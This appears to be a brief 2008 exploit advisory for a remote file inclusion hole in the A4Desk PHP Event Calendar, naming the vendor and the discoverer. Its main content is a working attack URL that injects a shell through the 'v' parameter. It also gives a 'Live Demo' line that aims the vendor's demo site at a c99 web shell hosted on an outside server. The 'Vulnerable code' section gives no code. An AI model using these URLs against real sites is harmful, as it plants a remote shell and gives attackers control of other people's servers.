A4Desk PHP Event Calendar suffers from a remote file inclusion vulnerability.
7d9ec4f7d7eb87cdc98fedf188d969ca914a63b8d3d1bddaa96686b4471a1587
=================================================================
========A4Desk PHP Event Calendar Remote File Inclusion========
=================================================================
Vendor: WebUnion Media Ltd
Vendor Site: https://php.a4desk.com/calendar/
Date Discovered: 9-29-08
Discovered By: Lo$er
====Vulnerable code====
Gonna pay (i got lucky finding this)
====RFI====
https://www.[site].com/[path]/index.php?date=&v=[shell]?
===Live Demo===
https://php.a4desk.com/calendar/demo/index.php?date=&v=https://www.evilc0der.com/c99.txt?